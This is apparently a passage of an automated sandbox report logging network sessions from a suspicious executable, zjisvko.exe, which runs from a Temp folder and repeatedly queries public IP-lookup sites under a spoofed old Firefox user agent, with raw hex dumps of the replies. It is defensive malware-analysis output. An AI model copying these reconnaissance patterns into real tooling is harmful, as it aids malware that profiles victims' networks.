                                                                                                                                                                                                                                                    44192.168.11.3049897104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.258682966 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.404212952 CEST851INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:22 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:22 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U3XdX5BGA9se7pdNRi29lAQDoAZbnXJMAni8Y3triAsXefq0TmwTVQx3gX1reX0KZkg0FLPkqE73725QGo0DMgutWVp1dH9i3C7iIVDrkUGcvFvGG4IAQtN3Rr%2BgvHnSuEE1iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038778bc32269-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    45192.168.11.3049901104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.741761923 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.893861055 CEST855INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:24 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:24 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cveyvohVFavoSPEuC1p%2FYqAjYq5kBqqyiUewPp1ffRqkWb2gLMJY51aKqz2zMcR1i0X%2Fugvo5zx%2BbPlA4l3luS6PQ3oso3OC5ciC3bpZM7YDaktoNNZBekcu7FrGI69DIjkHBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038870b56495e-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    46192.168.11.3049904104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.067579031 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.207514048 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:40:42 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=3KmCd1iTglOQmKtxyeKONNrNCnlRmgWQGTWjR52AWUU-1728999627-1.0.1.1-w_UaW0tu59N_neXqjWixCLbUAGXl5Fc1ZSzu5lWp2qGXRcxW8LC2cl8OJp2i9gGaqhcB8ETQwQkqqOGmDVxVjQ; path=/; expires=Tue, 15-Oct-24 14:10:27 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038959d9aa528-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.207623005 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.207746029 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.207761049 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 38 39 35 39 64 39 61 61 35 32 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d3038959d9aa528</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    47192.168.11.3049905172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.365048885 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.505347967 CEST878INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:28 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KhxOzsHfoOOPo91TTCfFMmPwFU%2FG29hdoo34QzfFlrtPCcVbbbO6uihopc5zWRQi1w3yC0aBDG5nkWYEGqrk1o6InDZGmLI3XuQlpN9luN%2BLMxBRzTwlAVVqA0zGunx40fUhPqD%2BJR2i7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30389daa0cd9ad-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    48192.168.11.3049909172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.806879997 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.950052977 CEST880INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:30 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6BdCzNwCIJlj6lKU01CDv2AWmxklqICRwzCmjQBtVknKJbfY8pRADV3eeBm3Du2ILGPO8TDKi1lRZGg89ZaCJnBEymIDBq2JcbuC6ZU5CPCk41B%2B8o%2B2xjtaiduk5Byu0sckA%2FQ%2FgOqfeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038ace9d5259a-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    49192.168.11.3049913172.67.155.17580
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.130750895 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.271306992 CEST882INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:33 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:33 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fLBqussh%2BMNZYACI%2B%2FnpMlV9682rP6%2B76UOvQKZSOAKJ31AiYfiWd7nLe2cCq3Ni3u2ue27YcdnHxdFbcyyVYnmzA2YRWTcnMJM4EGmekpzsPF6QvispNaRqklB5bU7454dc3hBM%2B0oUgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038bb7b2d74b8-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    50192.168.11.3049914172.67.155.17580
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.442751884 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.592084885 CEST880INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:34 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:34 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WGI%2Fz%2FeK8JMJRqjvGmJa%2BerOmH2qJ4uaCzij9dFBQ8aehTLfwYoHGWIDUHKXhvYswSGkSyZgwcaQYNj0UOja5NBmGIVEZMfy%2BTVioDN6LqDvgX4e9FpTNYJvaoUGRQdqeIuhMeWOtF1CMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038c3ae868dfc-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    51192.168.11.3049915104.27.207.9280
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.754916906 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.898957968 CEST859INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:35 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2BuZBCprcyFokiQnPsj%2BVvdmsWtu4TIySWMzhFGq5QSdHnCLxpnWEWK3r8qp3Cd6nyOONNdxm%2BnaZSc35Kd3e6ZKMu%2B%2BJfhyRTlFgqQzIvLcihvPl4sgCbFDw7qHoRU8ig8kEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038cbdedb8d9a-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    52192.168.11.3049919104.19.223.7980
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.194983959 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335241079 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:40:53 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=ZUqrKhDp8xQn2DKspgYSS_EbV0bhRxRvgFryELuZ3O0-1728999638-1.0.1.1-upkv__2Z8cWMQyLaTM.2lOXjH2k6AKKbrH.NPjDs6cy7f0js8ACsPjezBVbHt9zJFXgwqaM0mnRp3puZNGxZYA; path=/; expires=Tue, 15-Oct-24 14:10:38 GMT; domain=.whatismyipaddress.com; HttpOnly
